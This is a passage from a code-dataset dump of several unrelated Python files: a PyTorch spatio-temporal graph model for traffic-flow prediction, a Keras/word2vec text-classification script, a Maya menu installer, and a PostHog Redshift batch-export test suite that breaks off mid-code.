3, 1)\n sem_k = self.sem_k_conv(stX).permute(0, 2, 3, 1)\n sem_v = self.sem_v_conv(stX).permute(0, 2, 3, 1)\n sem_attn = (sem_q @ sem_k.transpose(-2, -1))\n\n geo_mask = self.assemblingMask(geo_mask)\n if geo_mask is not None:\n sem_attn.masked_fill_(geo_mask, float('-inf'))\n\n\n sem_attn = sem_attn.softmax(dim=-1)\n sem_attn = self.sem_attn_drop(sem_attn)\n sem_x = (sem_attn @ sem_v).transpose(2, 3).reshape(B, T, 3*N, -1)\n sem_x = sem_x.reshape(B, T, 3, N, -1)\n sem_x = sem_x[:, :, 1, :, :].reshape(B, T, N, -1)\n x = self.proj_drop(sem_x)\n return x\n\nclass CrossAttention(nn.Module):\n def __init__(self, c_in=22, c_out=22, qkv_bias=False, attn_drop=0., proj_drop=0., device=torch.device('cuda')):\n super().__init__()\n self.sem_q_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_k_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_v_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(c_in, c_in)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x, y):\n B, D, T, N = x.shape\n\n sem_q = self.sem_q_conv(x).permute(0, 2, 3, 1)\n sem_k = self.sem_k_conv(y).permute(0, 2, 3, 1)\n sem_v = self.sem_v_conv(y).permute(0, 2, 3, 1)\n sem_attn = (sem_q @ sem_k.transpose(-2, -1))\n sem_attn = sem_attn.softmax(dim=-1)\n sem_attn = self.sem_attn_drop(sem_attn)\n\n sem_x = (sem_attn @ sem_v)\n z = self.proj_drop(sem_x)\n return z\n\nclass AFF(nn.Module):\n def __init__(self, channels=22, inter_channels=6):\n super(AFF, self).__init__()\n\n self.local_att = nn.Sequential(\n nn.Conv2d(channels, inter_channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(inter_channels, channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(channels),\n )\n\n self.global_att = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(channels, inter_channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(inter_channels, channels, kernel_size=1, stride=1, padding=0),\n nn.BatchNorm2d(channels),\n )\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x, residual):\n xa = x + residual\n xl = self.local_att(xa)\n xg = self.global_att(xa)\n xlg = xl + xg\n wei = self.sigmoid(xlg)\n xo = 2 * x * wei + 2 * residual * (1 - wei)\n return xo\n\nclass DSTGCN(nn.Module):\n def __init__(self, c_in, c_out, ks, N, T=12, bias=None):\n super().__init__()\n self.cheb_graph_conv1 = ChebGraphConvForBatch(c_in, c_out, ks, bias)\n self.cheb_graph_conv2 = ChebGraphConvForBatch(c_out, c_out, ks, bias)\n\n p_t12 = torch.randn(N, requires_grad=True)\n self.p_t12 = torch.nn.Parameter(p_t12)\n self.register_parameter(\"p_t12\", self.p_t12)\n\n p_t21 = torch.randn(N, requires_grad=True)\n self.p_t21 = torch.nn.Parameter(p_t21)\n self.register_parameter(\"p_t21\", self.p_t21)\n\n p_t23 = torch.randn(N, requires_grad=True)\n self.p_t23 = torch.nn.Parameter(p_t23)\n self.register_parameter(\"p_t23\", self.p_t23)\n\n p_t32 = torch.randn(N, requires_grad=True)\n self.p_t32 = torch.nn.Parameter(p_t32)\n self.register_parameter(\"p_t32\", self.p_t32)\n\n self.norm = nn.LayerNorm(c_out)\n\n def assemblingL(self, p_t12, p_t21, p_t23, p_t32, gso, B):\n N = p_t12.shape[0]\n p_t12 = torch.diag_embed(p_t12).reshape(1, N, N).repeat(B, 1, 1)\n p_t21 = torch.diag_embed(p_t21).reshape(1, N, N).repeat(B, 1, 1)\n p_t23 = torch.diag_embed(p_t23).reshape(1, N, N).repeat(B, 1, 1)\n p_t32 = torch.diag_embed(p_t32).reshape(1, N, N).repeat(B, 1, 1)\n\n zeroN = torch.zeros([B, N, N], device=torch.device(\"cuda\"))\n L_row1 = torch.concat([gso, p_t12, zeroN], 1)\n L_row2 = torch.concat([p_t21, gso, p_t23], 1)\n L_row3 = torch.concat([zeroN, p_t32, gso], 1)\n return torch.concat([L_row1, L_row2, L_row3], 2)\n\n def forward(self, x, st_gso):\n B, T, N, D = x.shape\n\n st_gso = self.assemblingL(self.p_t12, self.p_t21, self.p_t23, self.p_t32, st_gso, B)\n\n x = torch.concat([x[:, 0, :, :].reshape(B,1,N,D), x, x[:, T - 1, :, :].reshape(B,1,N,D)], 1)\n\n stX = x.unfold(1,3,1)\n stX = stX.permute(0, 3, 1, 4, 2)\n stX = stX.reshape(stX.shape[0], stX.shape[1], stX.shape[2], stX.shape[3]*stX.shape[4])\n\n h = self.cheb_graph_conv1(stX, st_gso).permute(0, 3, 1, 2)\n h = h.reshape(h.shape[0], h.shape[1], h.shape[2], 3, -1)\n h = h[:, :, :, 1, :].reshape(h.shape[0], h.shape[1], h.shape[2], -1)\n h = self.norm(torch.permute(h, (0, 2, 3, 1)))\n return h\n\nclass LSTGCN(nn.Module):\n\n def __init__(self, c_in, c_out, ks, gso, bias=None):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.ks = ks\n self.gso = gso\n self.bias = bias\n\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.relu = nn.ReLU()\n self.leaky_relu = nn.LeakyReLU()\n self.cheb_graph_conv = ChebGraphConv(c_in, c_out, ks, gso, bias)\n\n self.conv2d = nn.Conv2d(in_channels=c_out, out_channels=c_out, kernel_size=(12, 1))\n self.sig_conv2d = nn.Conv2d(in_channels=c_out, out_channels=c_out, kernel_size=(12, 1))\n\n def forward(self, x):\n B, T, N, D = x.shape\n x = torch.permute(x, (0, 3, 1, 2))\n x=self.cheb_graph_conv(x).permute(0, 3, 1, 2)\n x = torch.mul(self.tanh(self.conv2d(x)), self.sigmoid(self.sig_conv2d(x)))\n x = x.permute(0, 2, 3, 1)\n return x\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\nclass STEncoderBlock(nn.Module):\n def __init__(\n self, c_in, c_out, ks, gso, mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0.,\n drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm, device=torch.device('cuda'), output_dim=1):\n super().__init__()\n self.norm1 = norm_layer(c_in)\n self.dstformer = DSTFormer(c_in, c_out, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop, device=device)\n self.dstgcn = DSTGCN(c_in, c_out, ks, int(gso.shape[0]), bias=None)\n self.lstgcn = LSTGCN(c_in, c_out, ks, gso, bias=None)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(c_in)\n self.mlp = Mlp(in_features=c_in, hidden_features=c_in, act_layer=act_layer, drop=drop)\n\n self.aff = AFF()\n self.cross_atten = CrossAttention()\n self.device = torch.device('cuda')\n\n def forward(self, x, st_gso, geo_mask=None, sem_mask=None):\n norm_x = self.norm1(x)\n torch.cuda.synchronize(self.device)\n x_dg = self.dstgcn(norm_x, st_gso).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_lg = self.lstgcn(norm_x).repeat(1, 12, 1, 1).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_df = self.dstformer(norm_x, geo_mask=geo_mask, sem_mask=sem_mask).permute(0, 3, 1, 2)\n torch.cuda.synchronize(self.device)\n\n x_dst = self.aff(x_df, x_lg)\n x_st = self.cross_atten(x_dg, x_dst)\n\n x_st = torch.cat([x_dg.permute(0, 2, 3, 1), x_dst.permute(0, 2, 3, 1), x_st], dim=-1)\n x = x + self.drop_path(x_st)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\nclass DMSTG(AbstractTrafficStateModel):\n def __init__(self, config, data_feature):\n super().__init__(config, data_feature)\n\n self._scaler = self.data_feature.get('scaler')\n self.num_nodes = self.data_feature.get(\"num_nodes\", 1)\n self.feature_dim = self.data_feature.get(\"feature_dim\", 1)\n self.ext_dim = self.data_feature.get(\"ext_dim\", 0)\n self.num_batches = self.data_feature.get('num_batches', 1)\n\n self.dtw_matrix = self.data_feature.get('dtw_matrix')\n\n self.adj_mx = data_feature.get('adj_mx')\n sd_mx = data_feature.get('sd_mx')\n sh_mx = data_feature.get('sh_mx')\n self._logger = getLogger()\n self.dataset = config.get('dataset')\n\n self.c_in = config.get('c_in', 66)\n self.c_out = config.get('c_out', 22)\n self.ks = config.get('ks', 3)\n\n self.embed_dim = 66\n self.skip_dim = config.get(\"skip_dim\", 256)\n lape_dim = config.get('lape_dim', 8)\n mlp_ratio = config.get(\"mlp_ratio\", 4)\n qkv_bias = config.get(\"qkv_bias\", True)\n drop = config.get(\"drop\", 0.)\n attn_drop = config.get(\"attn_drop\", 0.)\n drop_path = config.get(\"drop_path\", 0.3)\n enc_depth = config.get(\"enc_depth\", 2)\n self.type_short_path = config.get(\"type_short_path\", \"hop\")\n\n self.output_dim = config.get('output_dim', 1)\n self.input_window = config.get(\"input_window\", 12)\n self.output_window = config.get('output_window', 12)\n add_time_in_day = config.get(\"add_time_in_day\", True)\n add_day_in_week = config.get(\"add_day_in_week\", True)\n self.device = config.get('device', torch.device('cuda'))\n self.world_size = config.get('world_size', 1)\n self.huber_delta = config.get('huber_delta', 1)\n self.quan_delta = config.get('quan_delta', 0.25)\n self.far_mask_delta = config.get('far_mask_delta', 5)\n self.dtw_delta = config.get('dtw_delta', 5)\n\n self.use_curriculum_learning = config.get('use_curriculum_learning', True)\n self.step_size = config.get('step_size', 2500)\n self.max_epoch = config.get('max_epoch', 200)\n self.task_level = config.get('task_level', 0)\n if self.max_epoch * self.num_batches * self.world_size < self.step_size * self.output_window:\n self._logger.warning('Parameter `step_size` is too big with {} epochs and '\n 'the model cannot be trained for all time steps.'.format(self.max_epoch))\n if self.use_curriculum_learning:\n self._logger.info('Use use_curriculum_learning!')\n\n if self.type_short_path == \"dist\":\n distances = sd_mx[~np.isinf(sd_mx)].flatten()\n std = distances.std()\n sd_mx = np.exp(-np.square(sd_mx / std))\n self.far_mask = torch.zeros(self.num_nodes, self.num_nodes).to(self.device)\n self.far_mask[sd_mx < self.far_mask_delta] = 1\n self.far_mask = self.far_mask.bool()\n else:\n\n sh_mx = sh_mx.T\n self.geo_mask = torch.zeros(self.num_nodes, self.num_nodes).to(self.device)\n self.geo_mask[sh_mx >= self.far_mask_delta] = 1\n self.geo_mask = self.geo_mask.bool()\n self.sem_mask = torch.ones(self.num_nodes, self.num_nodes).to(self.device)\n sem_mask = self.dtw_matrix.argsort(axis=1)[:, :self.dtw_delta]\n for i in range(self.sem_mask.shape[0]):\n self.sem_mask[i][sem_mask[i]] = 0\n self.sem_mask = self.sem_mask.bool()\n\n\n st_gso = cal_laplacian(self.dtw_matrix)\n self.st_gso = torch.from_numpy(st_gso).float().to(self.device)\n\n gso = cal_laplacian(self.adj_mx)\n self.gso = torch.from_numpy(gso).float().to(self.device)\n\n self.enc_embed_layer = DataEmbedding(\n self.feature_dim - self.ext_dim, self.embed_dim, lape_dim, self.adj_mx, drop=drop,\n add_time_in_day=add_time_in_day, add_day_in_week=add_day_in_week, device=self.device,\n )\n\n enc_dpr = [x.item() for x in torch.linspace(0, drop_path, enc_depth)]\n\n self.encoder_blocks = nn.ModuleList([\n STEncoderBlock(\n c_in=self.c_in, c_out=self.c_out, ks=self.ks, gso=self.gso, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, drop=drop, attn_drop=attn_drop,\n drop_path=enc_dpr[i], act_layer=nn.GELU, norm_layer=partial(nn.LayerNorm, eps=1e-6), device=self.device, output_dim=self.output_dim\n ) for i in range(enc_depth)\n ])\n\n self.skip_convs = nn.ModuleList([\n nn.Conv2d(\n in_channels=self.embed_dim, out_channels=self.skip_dim, kernel_size=1,\n ) for _ in range(enc_depth)\n ])\n\n self.end_conv1 = nn.Conv2d(\n in_channels=self.input_window, out_channels=self.output_window, kernel_size=1, bias=True,\n )\n self.end_conv2 = nn.Conv2d(\n in_channels=self.skip_dim, out_channels=self.output_dim, kernel_size=1, bias=True,\n )\n self.lupdator = LUpdator(12, int(self.num_nodes))\n\n def forward(self, batch, lap_mx=None):\n x = batch['X']\n enc = self.enc_embed_layer(x, lap_mx)\n skip = 0\n N = int(self.st_gso.shape[0])\n B = int(enc.shape[0])\n st_gso = self.st_gso.reshape(1, N, N)\n st_gso = st_gso.repeat(B, 1, 1)\n\n st_gso = self.lupdator(enc, st_gso, self.geo_mask)\n\n\n for i, encoder_block in enumerate(self.encoder_blocks):\n enc = encoder_block(enc, st_gso, self.geo_mask, self.sem_mask)\n\n skip += self.skip_convs[i](enc.permute(0, 3, 2, 1))\n\n skip = self.end_conv1(F.relu(skip.permute(0, 3, 2, 1)))\n\n skip = self.end_conv2(F.relu(skip.permute(0, 3, 2, 1)))\n\n return skip.permute(0, 3, 2, 1)\n\n def get_loss_func(self, set_loss):\n if set_loss.lower() not in ['mae', 'mse', 'rmse', 'mape', 'logcosh', 'huber', 'quantile', 'masked_mae',\n 'masked_mse', 'masked_rmse', 'masked_mape', 'masked_huber', 'r2', 'evar']:\n self._logger.warning('Received unrecognized train loss function, set default mae loss func.')\n if set_loss.lower() == 'mae':\n lf = loss.masked_mae_torch\n elif set_loss.lower() == 'mse':\n lf = loss.masked_mse_torch\n elif set_loss.lower() == 'rmse':\n lf = loss.masked_rmse_torch\n elif set_loss.lower() == 'mape':\n lf = loss.masked_mape_torch\n elif set_loss.lower() == 'logcosh':\n lf = loss.log_cosh_loss\n elif set_loss.lower() == 'huber':\n lf = partial(loss.huber_loss, delta=self.huber_delta)\n elif set_loss.lower() == 'quantile':\n lf = partial(loss.quantile_loss, delta=self.quan_delta)\n elif set_loss.lower() == 'masked_mae':\n lf = partial(loss.masked_mae_torch, null_val=0)\n elif set_loss.lower() == 'masked_mse':\n lf = partial(loss.masked_mse_torch, null_val=0)\n elif set_loss.lower() == 'masked_rmse':\n lf = partial(loss.masked_rmse_torch, null_val=0)\n elif set_loss.lower() == 'masked_mape':\n lf = partial(loss.masked_mape_torch, null_val=0)\n elif set_loss.lower() == 'masked_huber':\n lf = partial(loss.masked_huber_loss, delta=self.huber_delta, null_val=0)\n elif set_loss.lower() == 'r2':\n lf = loss.r2_score_torch\n elif set_loss.lower() == 'evar':\n lf = loss.explained_variance_score_torch\n else:\n lf = loss.masked_mae_torch\n return lf\n\n def calculate_loss_without_predict(self, y_true, y_predicted, batches_seen=None, set_loss='masked_mae'):\n lf = self.get_loss_func(set_loss=set_loss)\n y_true = self._scaler.inverse_transform(y_true[..., :self.output_dim])\n y_predicted = self._scaler.inverse_transform(y_predicted[..., :self.output_dim])\n if self.training:\n if batches_seen % self.step_size == 0 and self.task_level < self.output_window:\n self.task_level += 1\n self._logger.info('Training: task_level increase from {} to {}'.format(\n self.task_level - 1, self.task_level))\n self._logger.info('Current batches_seen is {}'.format(batches_seen))\n if self.use_curriculum_learning:\n return lf(y_predicted[:, :self.task_level, :, :], y_true[:, :self.task_level, :, :])\n else:\n return lf(y_predicted, y_true)\n else:\n return lf(y_predicted, y_true)\n\n def calculate_loss(self, batch, batches_seen=None, lap_mx=None):\n y_true = batch['y']\n y_predicted = self.predict(batch, lap_mx)\n return self.calculate_loss_without_predict(y_true, y_predicted, batches_seen)\n\n def predict(self, batch, lap_mx=None):\n return self.forward(batch, lap_mx)\n","repo_name":"Polarstar671/DMSTG","sub_path":"libcity/model/traffic_flow_prediction/DMSTG.py","file_name":"DMSTG.py","file_ext":"py","file_size_in_byte":29450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15404232482","text":"import pandas as pd\nimport sys \nimport numpy as np\nimport math as m\nfrom keras.models import load_model\nimport jieba\nfrom gensim.models import word2vec\nimport h5py\nfrom keras.preprocessing.sequence import pad_sequences\n\njieba.load_userdict(sys.argv[2])\n\ntest_x = pd.read_csv(sys.argv[1], sep='delimiter', encoding='utf8')\ntest_x = pd.DataFrame(test_x)\ntest_x = np.array(test_x)\ntable = test_x.reshape([len(test_x)])\nran = len(table)\nfor i in range(ran):\n\ttable[i] = table[i].split(',', 1)[1]\n\ttable[i] = jieba.cut(table[i])\n\nmodel = word2vec.Word2Vec.load(\"word2vec_256.model\")\n\ntemp = []\nv = np.zeros(256)\nfor line in table:\n\ttempl = []\n\tfor word in line:\n\t\tif word in model:\n\t\t\tif word in model:\n\t\t\t\ttempl.append(model[word])\n\t\t\n\ttempl = np.array(templ)\t\n\ttemp.append(templ)\n\ntest_x = pad_sequences(temp, maxlen=48, dtype='int32', padding='post', truncating='post', value=model[' '])\n\nmodel = load_model(\"model.h5\")\ny_predict = model.predict(test_x)\n\nran = len(y_predict)\nfor i in range(ran):\n\tif y_predict[i] > 0.5:\n\t\ty_predict[i] = 1\n\telse:\n\t\ty_predict[i] = 0\ny_predict = y_predict.astype(int)\n\nindex = np.array([[str(i)] for i in range(ran)])\nsolution = np.hstack((index, y_predict))\nsolution = pd.DataFrame(solution)\nsolution.columns = ['id' , 'label']\nsolution.to_csv(sys.argv[3] , columns = ['id' , 'label'] , index = False , sep = ',')","repo_name":"jacksukk/ML2018FALL","sub_path":"hw4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010442407","text":"# -*- coding: utf-8 -*-\n\n# mbox\nimport mbox\n\n# mgear\nimport mgear.menu\n\n\ndef install():\n \"\"\"\n\n \"\"\"\n commands = (\n (\"Manager\", str_manager),\n (\"\", None),\n (\"Settings\", str_settings),\n (\"Extract Controls\", str_extract_controls),\n (\"\", None),\n (\"Build from selection\", str_build_from_selection),\n (\"Build from blueprint\", str_build_from_blueprint),\n (\"\", None),\n (\"Import blueprint\", str_import_blueprint),\n (\"Export blueprint\", str_export_blueprint),\n (\"\", None),\n (\"Reload lego box\", str_reload_lego_box)\n )\n mgear.menu.install(\"Lego\", commands, parent=mbox.menu_id)\n\n\nstr_manager = \"\"\"\nfrom mbox.lego import manager\nmanager.show_manager()\"\"\"\n\nstr_settings = \"\"\"\nfrom mbox.lego import lib\nlib.inspect_settings()\"\"\"\n\nstr_extract_controls = \"\"\"\nfrom mbox.lego import lib\nlib.extract_controls()\"\"\"\n\nstr_build_from_selection = \"\"\"\n\"\"\"\n\nstr_build_from_blueprint = \"\"\"\n\"\"\"\n\nstr_import_blueprint = \"\"\"\nfrom mbox.lego import lib\nlib.import_blueprint(None)\"\"\"\n\nstr_export_blueprint = \"\"\"\nfrom mbox.lego import lib\nlib.export_blueprint(None, None)\"\"\"\n\nstr_reload_lego_box = \"\"\"\n\"\"\"","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/lego/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513626519","text":"import datetime as dt\nimport json\nimport os\nimport warnings\nfrom random import randint\nfrom uuid import uuid4\n\nimport psycopg\nimport pytest\nimport pytest_asyncio\nfrom django.conf import settings\nfrom django.test import override_settings\nfrom psycopg import sql\nfrom temporalio.common import RetryPolicy\nfrom temporalio.testing import WorkflowEnvironment\nfrom temporalio.worker import UnsandboxedWorkflowRunner, Worker\n\nfrom posthog.temporal.batch_exports.batch_exports import (\n create_export_run,\n update_export_run_status,\n)\nfrom posthog.temporal.batch_exports.redshift_batch_export import (\n RedshiftBatchExportInputs,\n RedshiftBatchExportWorkflow,\n RedshiftInsertInputs,\n insert_into_redshift_activity,\n remove_escaped_whitespace_recursive,\n)\nfrom posthog.temporal.tests.utils.events import generate_test_events_in_clickhouse\nfrom posthog.temporal.tests.utils.models import (\n acreate_batch_export,\n adelete_batch_export,\n afetch_batch_export_runs,\n)\n\nREQUIRED_ENV_VARS = (\n \"REDSHIFT_USER\",\n \"REDSHIFT_PASSWORD\",\n \"REDSHIFT_HOST\",\n)\n\nMISSING_REQUIRED_ENV_VARS = any(env_var not in os.environ for env_var in REQUIRED_ENV_VARS)\n\n\npytestmark = [pytest.mark.django_db, pytest.mark.asyncio]\n\n\nasync def assert_events_in_redshift(connection, schema, table_name, events, exclude_events: list[str] | None = None):\n \"\"\"Assert provided events written to a given Redshift table.\"\"\"\n\n inserted_events = []\n\n async with connection.cursor() as cursor:\n await cursor.execute(\n sql.SQL(\"SELECT * FROM {} ORDER BY event, timestamp\").format(sql.Identifier(schema, table_name))\n )\n columns = [column.name for column in cursor.description]\n\n for row in await cursor.fetchall():\n event = dict(zip(columns, row))\n event[\"timestamp\"] = dt.datetime.fromisoformat(event[\"timestamp\"].isoformat())\n inserted_events.append(event)\n\n expected_events = []\n for event in events:\n event_name = event.get(\"event\")\n\n if exclude_events is not None and event_name in exclude_events:\n continue\n\n raw_properties = event.get(\"properties\", None)\n properties = remove_escaped_whitespace_recursive(raw_properties) if raw_properties else None\n expected_event = {\n \"distinct_id\": event.get(\"distinct_id\"),\n \"elements\": \"\",\n \"event\": event_name,\n \"ip\": properties.get(\"$ip\", None) if properties else None,\n \"properties\": json.dumps(properties, ensure_ascii=False) if properties else None,\n \"set\": properties.get(\"$set\", None) if properties else None,\n \"set_once\": properties.get(\"$set_once\", None) if properties else None,\n # Kept for backwards compatibility, but not exported anymore.\n \"site_url\": \"\",\n # For compatibility with CH which doesn't parse timezone component, so we add it here assuming UTC.\n \"timestamp\": dt.datetime.fromisoformat(event.get(\"timestamp\") + \"+00:00\"),\n \"team_id\": event.get(\"team_id\"),\n \"uuid\": event.get(\"uuid\"),\n }\n expected_events.append(expected_event)\n\n expected_events.sort(key=lambda x: (x[\"event\"], x[\"timestamp\"]))\n\n assert len(inserted_events) == len(expected_events)\n # First check one event, the first one, so that we can get a nice diff if\n # the included data is different.\n assert inserted_events[0] == expected_events[0]\n assert inserted_events == expected_events\n\n\n@pytest.fixture\ndef redshift_config():\n \"\"\"Fixture to provide a default configuration for Redshift batch exports.\n\n Reads required env vars to construct configuration, but if not present\n we default to local development PostgreSQL database, which should be mostly compatible.\n \"\"\"\n if MISSING_REQUIRED_ENV_VARS:\n user = settings.PG_USER\n password = settings.PG_PASSWORD\n host = settings.PG_HOST\n port = int(settings.PG_PORT)\n warnings.warn(\"Missing required Redshift env vars. Running tests against local PG database.\", stacklevel=1)\n\n else:\n user = os.environ[\"REDSHIFT_USER\"]\n password = os.environ[\"REDSHIFT_PASSWORD\"]\n host = os.environ[\"REDSHIFT_HOST\"]\n port = os.environ.get(\"REDSHIFT_PORT\", \"5439\")\n\n return {\n \"user\": user,\n \"password\": password,\n \"database\": \"posthog_batch_exports_test_2\",\n \"schema\": \"exports_test_schema\",\n \"host\": host,\n \"port\": int(port),\n }\n\n\n@pytest.fixture\ndef postgres_config(redshift_config):\n \"\"\"We shadow this name so that setup_postgres_test_db works with Redshift.\"\"\"\n psycopg._encodings._py_codecs[\"UNICODE\"] = \"utf-8\"\n psycopg._encodings.py_codecs.update((k.encode(), v) for k, v in psycopg._encodings._py_codecs.items())\n\n yield redshift_config\n\n\n@pytest_asyncio.fixture\nasync def psycopg_connection(redshift_config, setup_postgres_test_db):\n \"\"\"Fixture to manage a psycopg2 connection.\"\"\"\n connection = await psycopg.AsyncConnection.connect(\n user=redshift_config[\"user\"],\n password=redshift_config[\"password\"],\n dbname=redshift_config[\"database\"],\n host=redshift_config[\"host\"],\n port=redshift_config[\"port\"],\n )\n connection.prepare_threshold = None\n\n yield connection\n\n await connection.close()\n\n\n@pytest.mark.parametrize(\"exclude_events\", [None, [\"test-exclude\"]], indirect=True)\nasync def test_insert_into_redshift_activity_inserts_data_into_redshift_table(\n clickhouse_client, activity_environment, psycopg_connection, redshift_config, exclude_events\n):\n \"\"\"Test that the insert_into_redshift_activity function inserts data into a Redshift table.\n\n We use the generate_test_events_in_clickhouse function to generate several sets\n of events. Some of these sets are expected to be exported, and others not. Expected\n events are those that:\n * Are created for the team_id of the batch export.\n * Are created in the date range of the batch export.\n * Are not duplicates of other events that are in the same batch.\n * Do not have an event name contained in the batch export's exclude_events.\n\n Once we have these events, we pass them to the assert_events_in_redshift function to check\n that they appear in the expected Redshift table.\n \"\"\"\n data_interval_start = dt.datetime(2023, 4, 20, 14, 0, 0, tzinfo=dt.timezone.utc)\n data_interval_end = dt.datetime(2023, 4, 25, 15, 0, 0, tzinfo=dt.timezone.utc)\n\n # Generate a random team id integer. There's still a chance of a collision,\n # but it's very small.\n team_id = randint(1, 1000000)\n\n (events, _, _) = await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=1000,\n count_outside_range=10,\n count_other_team=10,\n duplicate=True,\n properties={\n \"$browser\": \"Chrome\",\n \"$os\": \"Mac OS X\",\n \"whitespace\": \"hi\\t\\n\\r\\f\\bhi\",\n \"nested_whitespace\": {\"whitespace\": \"hi\\t\\n\\r\\f\\bhi\"},\n \"sequence\": {\"mucho_whitespace\": [\"hi\", \"hi\\t\\n\\r\\f\\bhi\", \"hi\\t\\n\\r\\f\\bhi\", \"hi\"]},\n \"multi-byte\": \"é\",\n },\n person_properties={\"utm_medium\": \"referral\", \"$initial_os\": \"Linux\"},\n )\n\n (events_with_no_properties, _, _) = await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n properties=None,\n person_properties=None,\n )\n\n if exclude_events:\n for event_name in exclude_events:\n await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n event_name=event_name,\n )\n\n insert_inputs = RedshiftInsertInputs(\n team_id=team_id,\n table_name=\"test_table\",\n data_interval_start=data_interval_start.isoformat(),\n data_interval_end=data_interval_end.isoformat(),\n exclude_events=exclude_events,\n **redshift_config,\n )\n\n await activity_environment.run(insert_into_redshift_activity, insert_inputs)\n\n await assert_events_in_redshift(\n connection=psycopg_connection,\n schema=redshift_config[\"schema\"],\n table_name=\"test_table\",\n events=events + events_with_no_properties,\n exclude_events=exclude_events,\n )\n\n\n@pytest.fixture\ndef table_name(ateam, interval):\n return f\"test_workflow_table_{ateam.pk}_{interval}\"\n\n\n@pytest_asyncio.fixture\nasync def redshift_batch_export(ateam, table_name, redshift_config, interval, exclude_events, temporal_client):\n destination_data = {\n \"type\": \"Redshift\",\n \"config\": {**redshift_config, \"table_name\": table_name, \"exclude_events\": exclude_events},\n }\n batch_export_data = {\n \"name\": \"my-production-redshift-export\",\n \"destination\": destination_data,\n \"interval\": interval,\n }\n\n batch_export = await acreate_batch_export(\n team_id=ateam.pk,\n name=batch_export_data[\"name\"],\n destination_data=batch_export_data[\"destination\"],\n interval=batch_export_data[\"interval\"],\n )\n\n yield batch_export\n\n await adelete_batch_export(batch_export, temporal_client)\n\n\n@pytest.mark.parametrize(\"interval\", [\"hour\", \"day\"], indirect=True)\n@pytest.mark.parametrize(\"exclude_events\", [None, [\"test-exclude\"]], indirect=True)\nasync def test_redshift_export_workflow(\n clickhouse_client,\n redshift_config,\n psycopg_connection,\n interval,\n redshift_batch_export,\n ateam,\n exclude_events,\n table_name,\n):\n \"\"\"Test Redshift Export Workflow end-to-end.\n\n The workflow should update the batch export run status to completed and produce the expected\n records to the provided Redshift instance.\n \"\"\"\n data_interval_end = dt.datetime.fromisoformat(\"2023-04-25T14:30:00.000000+00:00\")\n data_interval_start = data_interval_end - redshift_batch_export.interval_time_delta\n\n (events, _, _) = await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=ateam.pk,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=100,\n count_outside_range=10,\n count_other_team=10,\n duplicate=True,\n properties={\"$browser\": \"Chrome\", \"$os\": \"Mac OS X\"},\n person_properties={\"utm_medium\": \"referral\", \"$initial_os\": \"Linux\"},\n )\n\n if exclude_events:\n for event_name in exclude_events:\n await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=ateam.pk,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n event_name=event_name,\n )\n\n workflow_id = str(uuid4())\n inputs = RedshiftBatchExportInputs(\n team_id=ateam.pk,\n batch_export_id=str(redshift_batch_export.id),\n data_interval_end=\"2023-04-25 14:30:00.000000\",\n interval=interval,\n **redshift_batch_export.destination.config,\n )\n\n async with await WorkflowEnvironment.start_time_skipping() as activity_environment:\n async with Worker(\n activity_environment.client,\n task_queue=settings.TEMPORAL_TASK_QUEUE,\n workflows=[RedshiftBatchExportWorkflow],\n activities=[\n create_export_run,\n insert_into_redshift_activity,\n update_export_run_status,\n ],\n workflow_runner=UnsandboxedWorkflowRunner(),\n ):\n with 